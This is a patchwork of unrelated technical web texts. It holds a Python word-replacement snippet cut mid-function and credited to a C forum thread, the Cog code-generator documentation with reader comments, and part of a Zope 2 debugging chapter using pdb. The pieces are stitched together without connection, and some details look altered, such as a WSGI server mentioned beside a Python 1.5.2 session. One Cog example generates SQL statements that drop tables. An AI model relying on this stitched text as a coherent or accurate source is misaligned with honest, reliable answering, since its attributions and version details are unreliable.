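    emit the text before it plus `new`, then resume after the match."""
    out = []
    pos = 0
    while True:
        hit = line.find(old, pos)    # strstr() analogue
        if hit == -1:
            out.append(line[pos:])   # no more matches: emit the tail
            break
        out.append(line[pos:hit])    # text before the match
        out.append(new)              # the replacement word
        pos = hit + len(old)         # continue scanning after the match
    return "".join(out)

print(replace_word("the cat sat on the mat", "cat", "dog"))  # → the dog sat on the mat
```

In C the same loop would use the pointer returned by strstr() to compute the prefix length, fwrite the prefix, fputs the replacement, and advance the search pointer past the matched word.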
http://cboard.cprogramming.com/c-programming/45100-question-about-finding-word-replacing-printable-thread.html
Created 10 February 2004, last updated 27 February 2012

An older version of this document is also available in Russian.

Cog is a code generation tool. It lets you use pieces of Python code as generators in your source files to generate whatever code you need.

Cog transforms files in a very simple way: it finds chunks of Python code embedded in them, executes the Python code, and inserts its output back into the original file. The file can contain whatever text you like around the Python code. It will usually be source code.

For example, if you run this file through cog:

    // This is my C++ file.
    ...
    /*[[[cog
    import cog
    fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
    for fn in fnames:
        cog.outl("void %s();" % fn)
    ]]]*/
    //[[[end]]]
    ...

it will come out like this:

    // This is my C++ file.
    ...
    /*[[[cog
    import cog
    fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
    for fn in fnames:
        cog.outl("void %s();" % fn)
    ]]]*/
    void DoSomething();
    void DoAnotherThing();
    void DoLastThing();
    //[[[end]]]
    ...

Lines with triple square brackets are delimiter lines. The lines between [[[cog and ]]] are the generator Python code. The lines between ]]] and [[[end]]] are the output from the generator.

When cog runs, it discards the last generated Python output, executes the generator Python code, and writes its generated output into the file. All text lines outside of the special markers are passed through unchanged.

The cog marker lines can contain any text in addition to the triple square bracket tokens. This makes it possible to hide the generator Python code from the source file. In the sample above, the entire chunk of Python code is a C++ comment, so the Python code can be left in place while the file is treated as C++ code.

Cog is designed to be easy to run. It writes its results back into the original file while retaining the code it executed. This means cog can be run any number of times on the same file.
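The transformation described above can be modeled in a few lines. This is a toy illustration only — real cog handles marker prefixes, indentation, checksums, and error reporting, and the `out` helper here is a stand-in for cog's output functions:

```python
import io
import re

def toy_cog(text):
    """Toy model of cog's transform: run the generator code between
    [[[cog and ]]], then replace everything up to [[[end]]] with its
    output, keeping the generator in place so it can be run again."""
    pattern = re.compile(
        r"\[\[\[cog(?P<gen>.*?)\]\]\](?P<old>.*?)\[\[\[end\]\]\]",
        re.DOTALL,
    )

    def run(match):
        buf = io.StringIO()
        namespace = {"out": buf.write}     # stand-in for cog.out
        exec(match.group("gen"), namespace)
        return "[[[cog%s]]]\n%s[[[end]]]" % (match.group("gen"), buf.getvalue())

    return pattern.sub(run, text)

src = """[[[cog
for fn in ['DoSomething', 'DoAnotherThing']:
    out("void %s();\\n" % fn)
]]]
(stale output)
[[[end]]]"""
print(toy_cog(src))
```

Running the result through `toy_cog` again produces the same text, which is the key property the real tool relies on.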
Rather than have a source generator file, and a separate output file, typically cog is run with one file serving as both generator and output. Because the marker lines accommodate any language syntax, the markers can hide the cog Python code from the source file. This means cog files can be checked into source control without worrying about keeping the source files separate from the output files, without modifying build procedures, and so on.

I experimented with using a templating engine for generating code, and found myself constantly struggling with white space in the generated output, and mentally converting from the Python code I could imagine into its templating equivalent. The advantages of a templating system (that most of the code could be entered literally) were lost as the code generation tasks became more complex, and the generation process needed more logic. Cog lets you use the full power of Python for code generation, without a templating system dumbing down your tools for you.

Cog requires Python 2.6, 2.7, 3.2, or Jython 2.5.

Cog is installed with a standard Python distutils script:

    $ python setup.py install

You should now have cog.py in your Python scripts directory.

Cog is distributed under the MIT license. Use it to spread goodness through the world.

Source files to be run through cog are mostly just plain text that will be passed through untouched. The Python code in your source file is standard Python code. Any way you want to use Python to generate text to go into your file is fine. Each chunk of Python code (between the [[[cog and ]]] lines) is called a generator and is executed in sequence. The output area for each generator (between the ]]] and [[[end]]] lines) is deleted, and the output of running the Python code is inserted in its place.

To accommodate all source file types, the format of the marker lines is irrelevant. If the line contains the special character sequence, the whole line is taken as a marker.
Any of these lines mark the beginning of executable Python code:

    //[[[cog
    /* cog starts now: [[[cog */
    -- [[[cog (this is cog Python code)
    #if 0 // [[[cog

Cog can also be used in languages without multi-line comments. If the marker lines all have the same text before the triple brackets, and all the lines in the generator code also have this text as a prefix, then the prefixes are removed from all the generator lines before execution. For example, in a SQL file, this:

    --[[[cog
    -- import cog
    -- for table in ['customers', 'orders', 'suppliers']:
    --     cog.outl("drop table %s;" % table)
    --]]]
    --[[[end]]]

will produce this:

    --[[[cog
    -- import cog
    -- for table in ['customers', 'orders', 'suppliers']:
    --     cog.outl("drop table %s;" % table)
    --]]]
    drop table customers;
    drop table orders;
    drop table suppliers;
    --[[[end]]]

Finally, a compact form can be used for single-line generators. The begin-code marker and the end-code marker can appear on the same line, and all the text between them will be taken as a single Python line:

    // blah blah
    //[[[cog import MyModule as m; m.generateCode() ]]]
    //[[[end]]]

You can also use this form to simply import a module. The top-level statements in the module can generate the code.

If there are multiple generators in the same file, they are executed with the same globals dictionary, so it is as if they were all one Python module.

Cog tries to do the right thing with white space. Your Python code can be block-indented to match the surrounding text in the source file, and cog will re-indent the output to fit as well. All of the output for a generator is collected as a block of text, a common whitespace prefix is removed, and then the block is indented to match the indentation of the cog generator. This means the left-most non-whitespace character in your output will have the same indentation as the begin-code marker line. Other lines in your output keep their relative indentation.
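The whitespace behavior described in the last paragraph can be sketched with the standard library. This is an assumption-level model of the reindentation step, not cog's actual code:

```python
import textwrap

def reindent_block(output, marker_indent):
    """Model of cog's output handling: strip the common whitespace
    prefix from the generated block, then indent the whole block to
    match the indentation of the begin-code marker line."""
    dedented = textwrap.dedent(output)
    return textwrap.indent(dedented, marker_indent)

# Generated output with a 2-space common prefix and one deeper line;
# the generator's marker line is indented 4 spaces.
out = "  void DoSomething();\n    void DoAnotherThing();\n"
print(reindent_block(out, "    "), end="")
```

The second line keeps its extra indentation relative to the first, exactly as the documentation promises.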
A module called cog provides the functions you call to produce output into your file. The most commonly used are cog.out and cog.outl (which appends a newline); for example:

    cog.out("""
        These are lines I
        want to write into my source file.
    """, dedent=True, trimblanklines=True)

Cog is a command-line utility which takes arguments in standard form.

    cog - generate code with inlined Python code.

    cog [OPTIONS] [INFILE | @FILELIST] ...

    INFILE is the name of an input file.
    FILELIST is the name of a text file containing file names or
        other @FILELISTs.

    OPTIONS:
        -c          Checksum the output to protect it against accidental change.
        -d          Delete the generator code from the output file.
        -D name=val Define a global string available to your generator code.
        -e          Warn if a file has no cog code in it.
        -I PATH     Add PATH to the list of directories for data files and modules.
        -o OUTNAME  Write the output to OUTNAME.
        -r          Replace the input file with the output.
        -s STRING   Suffix all generated output lines with STRING.
        -U          Write the output with Unix newlines (only LF line-endings).
        -w CMD      Use CMD if the output file needs to be made writable.
                        A %s in the CMD will be filled with the filename.
        -x          Excise all the generated output without running the generators.
        -z          The [[[end]]] marker can be omitted, and is assumed at eof.
        -v          Print the version of cog and exit.
        -h          Print this help.

In addition to running cog as a command on the command line:

    $ cog [options] [arguments]

you can also invoke it as a module with the Python interpreter:

    $ python -m cogapp [options] [arguments]

Note that the Python module is called "cogapp".

Files on the command line are processed as input files. All input files are assumed to be UTF-8 encoded. Using a minus for a filename (-) will read the standard input.

Files can also be listed in a text file named on the command line with an @:

    $ cog @files_to_cog.txt

These @-files can be nested, and each line can contain switches as well as a file to process.
For example, you can create a file cogfiles.txt:

    # These are the files I run through cog
    mycode.cpp
    myothercode.cpp
    myschema.sql -s " --**cogged**"
    readme.txt -s ""

As another example, cogfiles2.txt could be:

    template.h -D thefile=data1.xml -o data1.h
    template.h -D thefile=data2.xml -o data2.h

The -r flag tells cog to write the output back to the input file. If the input file is not writable (for example, because it has not been checked out of a source control system), a command to make the file writable can be provided with -w:

    $ cog -r -w "p4 edit %s" @files_to_cog.txt

Global values can be set from the command line with the -D flag. The value is always interpreted as a Python string, to simplify the problem of quoting. This means that:

    cog -D NUM_TO_DO=12

will define NUM_TO_DO not as the integer 12, but as the string "12", which are different and not equal values in Python. Use int(NUM_TO_DO) to get the numeric value.
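The -D string semantics are easy to demonstrate:

```python
# What `cog -D NUM_TO_DO=12` defines is the *string* "12".
NUM_TO_DO = "12"

assert NUM_TO_DO != 12         # a str never equals an int in Python
assert int(NUM_TO_DO) == 12    # convert explicitly to get the number

print(int(NUM_TO_DO) * 2)  # → 24
```

Without the int() conversion, `NUM_TO_DO * 2` would instead give string repetition ("1212"), which is a common surprise with command-line-supplied values.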
For example, with this input file (mycode.txt): mycode.txt[[[cogcog.outl('Three times:\n')for i in range(3): cog.outl('This is line %d' % i)]]][[[end]]] mycode.txt [[[cogcog.outl('Three times:\n')for i in range(3): cog.outl('This is line %d' % i)]]][[[end]]] invoking cog like this: cog -s " //(generated)" mycode.txt will produce this output: [[[cogcog.outl('Three times:\n')for i in range(3): cog.outl('This is line %d' % i)]]]Three times: //(generated)This is line 0 //(generated)This is line 1 //(generated)This is line 2 //(generated)[[[end]]] The -x flag tells cog to delete the old generated output without running the generators. This lets you remove all the generated output from a source file. The -d flag tells cog to delete the generators from the output file. This lets you generate code in a public file but not have to show the generator to your customers. The -U flag causes the output file to use pure Unix newlines rather than the platform's native line endings. You can use this on Windows to produce Unix-style output files. The -I flag adds a directory to the path used to find Python modules. The -z flag lets you omit the [[[end]]] marker line, and it will be assumed at the end of the file. Cog's change log is on a separate change page. I'd love to hear about your successes or difficulties using cog. Comment here, or send me a note. There are a handful of other implementations of the ideas in Cog: You might like to read: I'm using Cog! I use it to do code generation for a library that's implemented in three different languages (C#, c++, Java). Linked from my blog. Thanks for the distribution fix! This is really nice - normally I don't like the idea of having files which are hand-edited AND machine generated, but this is simple enough to change my mind about this. I really like this. 
Some minor issues - the 'cog.py' file in scripts has a cr-lf at the end of the first line, which makes it fail to run, and makes distutils fail to edit in the proper python bin location. Easily fixed.

Running the script with no command line parameters should cause it to print a help message.

How about an option which will cause cog to fail with an error if the file's actual autogenerated code doesn't match the live python output? This might make more sense than '-r' for use in a makefile, to ensure that you don't edit the wrong code and have your changes discarded.

I notice that the 'import cog' is not actually required; this is good.

It would be very nice if each python snippet were run in the same global dictionary, so you could define a variable (or import a module) at one point and use it throughout.

Finally -- certain languages (VHDL, Makefiles, Python, for instance) do not have multi-line comments, so you can't use it with these, unless I am missing something. May I suggest: if the [[[cog is preceded by some text on its line, then all lines between that and the ]]] are checked to see if they start with the same text, and if so, that is discarded before further processing.

Thanks, Greg. I added the non-multi-line comment support, and a few other minor things. Thanks for the suggestions!

It looks neat, but I generally like to have no codegen code in the generated code. But a slightly different approach would fix that:

1. External Python or cog-CodeBehind file next to the source file.
2. You add naming to your cog-codegen slots. This allows the CodeBehind codegen code to find the output slot for its generated code.

EXAMPLE:

    // file: MyCxxFile.hpp
    // SLOT-CONTE
    /*[[[cog-slot:EnumerateMethods]]] */
    void DoSomething();
    void DoAnotherThing();
    void DoLastThing();
    //[[[end]]]

    // file: MyCxxFile.hpp.cogCodeBehind or MyCxxFile.hpp.cog or ...
    // NOTE: Comments etc. are optional now.
    /*[[[cog-codeBehind:EnumerateMethods
    import cog
    fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
    for fn in fnames:
        cog.outl("void %s();" % fn)
    ]]]*/

You can come close with Cog as it is. Remember that you can import any Python module you want into the cog code. By moving all of your Python code into another module, you can reduce the Cog code to a single import statement:

    // file: MyCxxFile.hpp
    /*[[[cog import MyCxxFileGen ]]]*/
    /*[[[end]]]*/

    # file: MyCxxFileGen.py
    import cog
    fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
    for fn in fnames:
        cog.outl("void %s();" % fn)

Cog is great, but what I'd really like to be able to do is the following:

    // [[[cog import mycodgen as m]]]
    // [[[end]]]
    ... lots of regular code ...
    // [[[cog m.somestuff()]]]
    // [[[end]]]
    ... other code ...
    // [[[cog m.otherstuff()]]]
    // [[[end]]]

As it is, each cog slot seems to "forget" the globals() dict for previous cog slots (i.e. line 86 in cogapp.py passes an empty globals() dict to eval).

You got it: 1.3 does what you want.

Just FYI, I think I've finally settled on COG as a tool for PHP code generation. Had looked at empy (some notes here:) but what's clinched it is the way you've implemented the output area. The mission is to eliminate any work PHP might do that relates to application configuration or the environment it's running in - stuff that won't change once an app is deployed, so eliminate the runtime overhead. One particular thing I want to keep is the ability to execute the PHP scripts while hacking, before they have been run through COG, e.g.

    /** [[[cog
    import cog
    cog.outl("require_once '/full/path/to/someClass.php';")
    ]]]*/
    // While hacking, use this
    require_once DEV_PATH . 'someClass.php';
    //[[[end]]]

May even ditch the require_once completely and have COG embed the class code directly into the script. Anyway - thanks.

Just what I'm looking for, thanks! However, I am using it to generate multiple source files from each template file (i.e. feed a different xml config file in to the template to generate a unique file). Is there any way to pass an argument (e.g. a file name) through the command line invocation? That way I could provide the xml file to the template dynamically. Thanks again!

Theo
feed a different xml config file in to the template to generate a unique file). Is there any way to pass an argument (e.g. a file name) through the command line invocation? That way I could provide the xml file to the template dynamically. Thanks again! Theo Theo, it would be straightforward to add a -D name=value syntax to the command line. Each would create a variable in the global context. I think this would cover your needs. I think this is a good idea. I'll add it into Cog soon. Excellent, looking forwards to it, Theo You know what COG really needs? A "COG-recipes" site. I'm sure people have developed some interesting scripts. One script I'm interested in (that I'm sure others would be too) is a script that will generate C++ functions that will translate enum values to and from string representations. Having a recipes site would allow me to share my code as well as allow others to give feedback about my script. can you use COG to make codes out of videos andpictures and soundfile? for instance on myspace you can go to websites and get html codes for videos, wich resemble COG in a way, would you be able to e-mail me backon this subject? I like the idea expressed by Kevin above about a "COG recipes" site. Because of that I started a COG Wiki site () to allow for discussions and code snippets for COG. Anyone who has snippets to share, please post them. The Wiki will become better as more people share their code. Hey man, this is a really handy tool you wrote. Keep up the great work. *And why not directing the stdout instead of cog.outl ? Thanks You should note that intalling COG also requires the PATH module. Hi, this tool certainly looks very promising, I'm going to give it a go to clean up some of the internals used in aqsis (). The other devs favour xsltproc at the moment - I'll see if I can convince them and myself... One thing I noticed after just installing cog-2.0 from the tarball is that cog.out no longer seems to recognise the trimnewlines command. 
After grepping the source I see that it's apparently been changed to trimblanklines? Is anyone willing to try and teach me this stuff? I find it really interesting, but I don't expect anyone to take me up on this; it seems really complicated. That's why I'm so interested. Bug report:

    /*[[[cog
    import cog
    cog.outl(" extern void simple1();")
    cog.outl(" extern void simple2();")
    ]]]*/
    //[[[end]]]

I think the result should be indented, since the dedent parameter isn't given and the default value is False. However, the result is "dedented". (reindentBlock is called twice) Jay: this code is behaving as intended. I've edited the description of indentation to try to make it clearer. The dedent parameter doesn't affect the indentation of the line in the output, just the interpretation of a multi-line string parameter. Cog collects output as a block of text, then indents the block to match the generator. The dedent parameter affects how cog adds the lines to the collected output, but not how that output is finally written. To see what the dedent parameter does, try putting five spaces at the left of one of your lines, and try it with dedent=True and dedent=False to see the difference. Sorry for the confusion. If you need the output block indented differently, indent your entire cog block to where you want the output to go. Hi Ned, this is some neat Python app :-) I would like to try it for some Java apps around here. Has anyone tried whether it works with Jython? If so I could easily use it from ant and would not require people to install Python. ... I just checked, it seems that Jython won't work since cog requires the compiler package (which isn't available on Jython). I've never used Jython, but yes, Cog depends on being able to execute the chunks of Python code it finds. Nice tool, thanks. I happily used cog 3 or so years ago on a C# project. Now I need it again! Thanks... FYI, I have code that users must run, and the code has strings with passwords in them.
I don't want users to be able to find passwords by looking at the code they run (strings show up in binary code). I'll use cog to generate encrypted strings, and when the program runs the strings will be decrypted. Users won't be able to see clear text passwords no matter what they do, except if they figure out the decryption code. This is not NSA type security, it is for ordinary users. Of course I could manually encrypt the password strings; then I'd not need cog. But that is a lot more work as there are several programs that will use this technique, and passwords change from time to time. The Python code will be very short. g. Great tool. Thanks Ned, I love cog. I use emacs too, and run cog from within emacs with a single keystroke, as you noted here. Thank you very much, haroldo. Brilliant. It saved me a lot of work. Thx. I prefer Enhanced CWEB and yesweb to do some of these things. (Enhanced CWEB will generate #line directives in the output file, and you can use metamacros and named chunks to do all sorts of things. This program can be used with C and C++.) (yesweb is written entirely in TeX, so you can use any TeX commands to extend its features.) Here are a bunch of examples of Enhanced CWEB metamacros:

    @m Repeat@T ``yg_Repeat @)
    @m _Repeat@T J@ A-g_Repeat @)
    @m Repeat@W q/@tRepeat Bq``: zyqnB" times:\ @> qA"@# @)
    @mp@- ``u{YJ"@<Predeclaration of procedures@>= qJA"; J"@ "@<Procedure codes@>= B" { @)
    @ms@- ``u{YJ"@<Static declarations@>= static qJA"; J"@ "@<Procedure codes@>= static B" { @)
    @mpacked@- q``Y/__attribute__((packed)) j/@t$\flat\ $@> AqA @)
    @)

Hi, I have code that has Windows line endings and got syntax errors on Linux because of them. Other developers use only Windows so changing the line endings of the file is a bit too tedious.
To fix this, I had to modify the evaluate method to convert \r\n line endings to \n before running the code:

    intext = "import cog\n" + intext + "\n"
    intext = intext.replace("\r\n", "\n")  # Replace Windows line endings

I like it. I use it. I would like the ability to add comments in my C code (like "do not edit" or "generated from somefile.txt"), which is a bit awkward since the closing comment mark terminates the cog code. I added this to my local version, which would be nice in a future release:

    Index: cogapp.py
    ===================================================================
    --- cogapp.py (revision 2416)
    +++ cogapp.py (revision 2417)
    @@ -131,6 +131,7 @@
             cog.cogmodule.msg = self.msg
             cog.cogmodule.out = self.out
             cog.cogmodule.outl = self.outl
    +        cog.cogmodule.c_comment = self.c_comment
             cog.cogmodule.error = self.error
             self.outstring = ''
    @@ -167,6 +168,13 @@
             self.out(sOut, **kw)
             self.out('\n')
    +    def c_comment(self, sOut='', **kw):
    +        """ Add a C-style comment to the output
    +        """
    +        self.out('/* ')
    +        self.out(sOut, **kw)
    +        self.out(' */\n')
    +
         def error(self, msg='Error raised by cog generator.'):
             """ The cog.error function.
                 Instead of raising standard python errors, cog generators can use

@Brad: I would rather not add a language-specific method like c_comment. Couldn't you output the comment closer as two strings, or with a backslash: cog.outl("/* comment *\/") @Ned: Sure. I'm ok with keeping it as a local change - just thought it might be an interesting addition. Splitting the comment isn't very "attractive", which is why I went with a wrapper (not dissimilar to how you don't _really_ need outl() - you could just use out() and add a "\\n" each time.) Thanks again for providing cog! When calling cog.py, it seems that it passes in sys.argv and modifies it. We like to do things locally that rely on sys.argv (mainly passing in the name of a program to databases so we know what/who's logged in).
Would you consider either having cog.py pass in list(sys.argv) to pass in a copy of sys.argv, or in cogapp.py set argv0=argv[0]; argv_rest = argv[1:] and then use argv_rest for parsing instead of doing argv.pop(0)? Sorry for asking a stupid question. Does this example still work?

    import cog
    cog.outl(" extern void simple1();")

I am having trouble running this in Eclipse/Pydev. Thanks for your help. A useful feature would be to have an option that would allow the output of running cog to accumulate between ]]] and [[[end]]] rather than have it deleted. An example use case for this would be a file whose purpose is to accumulate data that is produced periodically, such as from a weather data generation service. This would be a great application for cog if there were some way to have it not delete what was generated from previous runs. Further, it would be useful to specify that this behavior should apply per block rather than per file. This perhaps could be implemented as a meta-variable on the opening delimiter, say something like "p[[[cog{retain}", or something to that effect. What do you think? Hi Ned, a very useful tool. I would like to know: if I import one of my modules in one file, can I then use the functions present in that module, or any Python variable defined in that cog file, in another file? Hi Ned, I'm using cog for automating some code generation from a text file, and I love it. It works great for removing some of the repetition from my day. Unfortunately, I've come across a bug. I read my input text file, and store my code lines in a dictionary of lists. When I come to a specific section I loop over each line in each list, in the appropriate dictionary entry, and print them with cog.outl(). All the lines start with \t to indent them appropriately, but cog strips this out, unless I also print a line with no indent. I have found a bug (might not be after all).
Currently with the latest COG available for download, I am unable to indent the code with '\t' (tab) at the beginning. I am using cog.out and cog.outl for creating the code statements. Currently I have changed the "reindentBlock" function in "whiteutils.py", changing one statement to "l = l.replace(oldIndent, '\t', 1)". Can you please check whether it is a bug or am I missing something? Your "Success Story" link was changed on you. It is now . @Jason: thanks, fixed! Great! This is what I found; inline templates are very interesting for maintaining code. Thanks for the useful tool! It would be helpful if you added an example for how to use -D parameters. It took me a while to realise that they are visible to the code in the template, but not to the imported code, i.e. I needed to pass in the globals as parameters to my generator code. Very useful tool... thanks! Using it for C++ code generation. Please consider changing line 637 in cogapp.py to the following (and importing glob) to allow for wildcards on Windows:

    for filename in glob.glob(args[0]):
        self.processOneFile(filename)

Thanks for this tool! It would be useful to automatically create the directory when option -o is used. I use cog in my C++ project to encrypt data. And I've got a question: does cog work with unicode? The problem is that I try to get a character code in a unicode project. In my standalone Python project it works:

    # -*- coding: cp1251 -*-
    ...
    k = ord('а')  # russian unicode symbol, k = 1072

But cog gives me the ASCII code:

    [[[cog
    # -*- coding: cp1251 -*-
    import cog
    def test():
        k = ord('а')
        cog.out('CString strChar = _T("')
        cog.out("".join("%d" % ord(k)))
        cog.out('")')
    ]]]*/
    //[[[end]]]

and it gives me k = 224 (the same russian symbol, but in ASCII). I use the same interpreter in both cases (IronPython 2.7). Can you give me some advice?

2004–2012, Ned Batchelder
http://nedbatchelder.com/code/cog/index.html
9. Testing and Debugging

Attention: This document was written for Zope 2.

As you develop Zope applications you may run into problems. This chapter covers debugging and testing techniques that can help you. The Zope debugger allows you to peek inside a running process and find exactly what is going wrong. Unit testing allows you to automate the testing process to ensure that your code still works correctly as you change it. Finally, Zope provides logging facilities which allow you to emit warnings and error messages.

9.1. Debugging

Zope provides debugging information through a number of sources. It also allows you a couple of avenues for getting information about Zope as it runs.

9.1.1. Product Refresh Settings

As of Zope 2.4 there is a Refresh view on all Control Panel Products. Refresh allows you to reload your product's modules as you change them, rather than having to restart Zope to see your changes. The Refresh view provides the same debugging functionality previously provided by Shane Hathaway's Refresh Product. To turn on product refresh capabilities place a 'refresh.txt' file in your product's directory. Then visit the Refresh view of your product in the management interface. Here you can manually reload your product's modules with the Refresh this product button. This allows you to immediately see the effect of your changes, without restarting Zope. You can also turn on automatic refreshing, which causes Zope to frequently check for changes to your modules and refresh your product when it detects that your files have changed. Since automatic refresh causes Zope to run more slowly, it is a good idea to only turn it on for a few products at a time.

9.1.2. Debug Mode

Normally, debug mode is set using the '-D' switch when starting Zope. This mode reduces the performance of Zope a little bit. Debug mode has a number of wide-ranging effects:

- Tracebacks are shown in the browser when errors are raised.
- External Methods and DTMLFile objects are checked to see if they have been modified every time they are called. If modified, they are reloaded.
- Zope will not fork into the background in debug mode; instead, it will remain attached to the terminal that started it, and the main logging information will be redirected to that terminal.

By using debug mode and product refresh together you will have little reason to restart Zope while developing.

9.1.3. The Python Debugger

Zope is integrated with the Python debugger (pdb). The Python debugger is pretty simple as command line debuggers go, and anyone familiar with other popular command line debuggers (like gdb) will feel right at home in pdb. For an introduction to pdb see the standard pdb documentation. There are a number of ways to debug a Zope process:

- You can shut down the Zope server and simulate a request on the command line.
- You can run a special ZEO client that debugs a running server.
- You can run Zope in debug mode and enter the debugger through Zope's terminal session.

The first method is an easy way to debug Zope if you are not running ZEO. First, you must shut down the Zope process. It is not possible to debug Zope in this way and run it at the same time. Starting up the debugger this way will by default start Zope in single threaded mode. For most Zope developers' purposes, the debugger is needed to debug some sort of application level programming error. A common scenario is when developing a new product for Zope. Products extend Zope's functionality, but they also present the same kind of debugging problems that are commonly found in any programming environment. It is useful to have an existing debugging infrastructure to help you jump immediately to your new object and debug it and play with it directly in pdb. The Zope debugger lets you do this.
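Before pointing pdb at Zope, it can help to experiment with pdb on its own. As a standalone illustration (no Zope involved), pdb can even be driven non-interactively by feeding it a canned command stream, which is a handy way to try out the b (break), c (continue), and p (print) commands used throughout this chapter. The `buggy` function and the command sequence below are invented for this sketch:

```python
import io
import pdb


def buggy(n):
    # A stand-in for a method you might want to inspect under pdb.
    total = 0
    for i in range(n):
        total += i
    return total


# Feed pdb a canned command stream instead of typing at the (Pdb) prompt:
# set a breakpoint on buggy, continue to it, print its argument, continue.
commands = io.StringIO("b buggy\nc\np n\nc\n")
output = io.StringIO()
debugger = pdb.Pdb(stdin=commands, stdout=output, nosigint=True)
debugger.run("buggy(5)", globals())

transcript = output.getvalue()
print(transcript)
```

The transcript written to `output` shows the same kind of "Breakpoint 1 at ..." and stop messages that appear in the interactive sessions below; the only difference is that the commands came from a string instead of the keyboard.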
In reality, the "Zope" part of the Zope debugger is actually just a handy way to start up Zope with some pre-configured breakpoints and to tell the Python debugger where in Zope you want to start debugging.

9.1.3.1. Simulating HTTP Requests

Now for an example. Remember, for this example to work, you must shut down Zope. Go to your Zope's 'lib/python' directory and fire up Python and import 'Zope' and 'ZPublisher':

    $ cd lib/python
    $ python
    Python 1.5.2 (#0, Apr 13 1999, 10:51:12) [MSC 32 bit (Intel)] on win32
    Copyright 1991-1995 Stichting Mathematisch Centrum, Amsterdam
    >>> import Zope, ZPublisher
    >>>

Here you have run the Python interpreter (which is where using the debugger takes place) and imported two modules, 'Zope' and 'ZPublisher'. If Python complains about an 'ImportError' and not being able to find either module, then you are probably in the wrong directory, or you have not compiled Zope properly. If you get this message:

    ZODB.POSException.StorageSystemError: Could not lock the database file.
    There must be another process that has opened the file.

this tells you that Zope is currently running. Shut down Zope and try again. The 'Zope' module is the main Zope application module. When you import 'Zope' it sets up Zope. 'ZPublisher' is the Zope ORB. See Chapter 2 for more information about 'ZPublisher'. You can use the 'ZPublisher.Zope' function to simulate an HTTP request. Pass the function a URL relative to your root Zope object. Here is an example of how to simulate an HTTP request from the debugger:

    >>> ZPublisher.Zope('')
    Status: 200 OK
    X-Powered-By: Zope (), Python ()
    Content-Length: 1238
    Content-Type: text/html

    <HTML><HEAD><TITLE>Zope</TITLE>
    ... blah blah...
    </BODY></HTML>
    >>>

If you look closely, you will see that the content returned is exactly what is returned when you call your root level object through HTTP, including all the HTTP headers. Keep in mind that calling Zope this way does NOT involve a web server. No ports are opened.
In fact, this is just an interpreter front end to the same application code that the WSGI server calls.

9.1.3.2. Interactive Debugging

Debugging involves publishing a request up to a point where you think it's failing, and then inspecting the state of your variables and objects. The easy part is the actual inspection; the hard part is getting your program to stop at the right point. So, for the sake of our example, let's say that you have a 'News' object which is defined in a Zope Product called 'ZopeNews', and is located in the 'lib/python/Products/ZopeNews' directory. The class that defines the 'News' instance is also called 'News', and is defined in the 'News.py' module in your product. Therefore, from Zope's perspective the fully qualified name of your class is 'Products.ZopeNews.News.News'. All Zope objects have this kind of fully qualified name. For example, the 'ZCatalog' class can be found in 'Products.ZCatalog.ZCatalog.ZCatalog' (the redundancy is because the product, module, and class are all named 'ZCatalog'). Now let's create an example method to debug. You want your news object to have a 'postnews' method that posts news:

    class News(...):
        ...
        def postnews(self, news, author="Anonymous"):
            self.news = news

        def quote(self):
            return '%s said, "%s"' % (self.author, self.news)

You may notice that there's something wrong with the 'postnews' method. The method assigns 'news' to an instance variable, but it does nothing with 'author'. If the 'quote' method is called, it will raise an 'AttributeError' when it tries to look up the name 'self.author'. Although this is a pretty obvious goof, we'll use it to illustrate using the debugger to fix it. Running the debugger is done in a very similar way to how you called Zope through the Python interpreter before, except that you introduce one new argument to the call to 'Zope':

    >>> ZPublisher.Zope('/News/postnews?new=blah', d=1)
    * Type "s<cr>c<cr>" to jump to beginning of real publishing process.
    * Then type c<cr> to jump to the beginning of the URL traversal algorithm.
    * Then type c<cr> to jump to published object call.
    > <string>(0)?()
    pdb>

Here, you call Zope from the interpreter, just like before, but there are two differences. First, you call the 'postnews' method with an argument using the URL, '/News/postnews?new=blah'. Second, you provided a new argument to the Zope call, 'd=1'. The 'd' argument, when true, causes Zope to fire up in the Python debugger, pdb. Notice how the Python prompt changed from '>>>' to 'pdb>'. This indicates that you are in the debugger. When you first fire up the debugger, Zope gives you a helpful message that tells you how to get to your object. To understand this message, it's useful to know how you have set Zope up to be debugged. When Zope fires up in debugger mode, there are three breakpoints set for you automatically (if you don't know what a breakpoint is, you need to read the Python debugger documentation). The first breakpoint stops the program at the point that ZPublisher (the Zope ORB) tries to publish the application module (in this case, the application module is 'Zope'). The second breakpoint stops the program right before ZPublisher tries to traverse down the provided URL path (in this case, '/News/postnews'). The third breakpoint will stop the program right before ZPublisher calls the object it finds that matches the URL path (in this case, the 'News' object). So, the little blurb that comes up and tells you some keys to press is telling you these things in a terse way. Hitting 's' will step you into the debugger, and hitting 'c' will continue the execution of the program until it hits a breakpoint. Note however that none of these breakpoints will stop the program at 'postnews'. To stop the debugger right there, you need to tell the debugger to set a new breakpoint. Why a new breakpoint?
Because Zope will stop you before it traverses your object's path, and it will stop you before it calls the object, but if you want to stop it exactly at some point in your code, then you have to be explicit. Sometimes the first three breakpoints are convenient, but often you need to set your own special breakpoint to get you exactly where you want to go. Setting a breakpoint is easy (and see the next section for an even easier method). For example:

    pdb> import Products
    pdb> b Products.ZopeNews.News.News.postnews
    Breakpoint 5 at C:\Program Files\WebSite\lib\python\Products\ZopeNews\News.py:42
    pdb>

First, you import 'Products'. Since your module is a Zope product, it can be found in the 'Products' package. Next, you set a new breakpoint with the break debugger command (pdb allows you to use single letter commands, but you could have also used the entire word 'break'). The breakpoint you set is 'Products.ZopeNews.News.News.postnews'. After setting this breakpoint, the debugger will respond that it found the method in question in a certain file, on a certain line (in this case, the fictitious line 42) and return you to the debugger. Now, you want to get to your 'postnews' method so you can start debugging it. But along the way, you must first continue through the various breakpoints that Zope has set for you. Although this may seem like a bit of a burden, it's actually quite good to get a feel for how Zope works internally by getting down the rhythm that Zope uses to publish your object. In these next examples, my comments will begin with '#'. Obviously, you won't see these comments when you are debugging.
So let's debug:

    pdb> s              # 's'tep into the actual debugging
    > <string>(1)?()    # this is pdb's response to being stepped into, ignore it
    pdb> c              # now, let's 'c'ontinue onto the next breakpoint
    > C:\Program Files\WebSite\lib\python\ZPublisher\Publish.py(112)publish()
    -> def publish(request, module_name, after_list, debug=0,

    # pdb has stopped at the first breakpoint, which is the point where
    # ZPublisher tries to publish the application module.

    pdb> c              # continuing onto the next breakpoint you get...
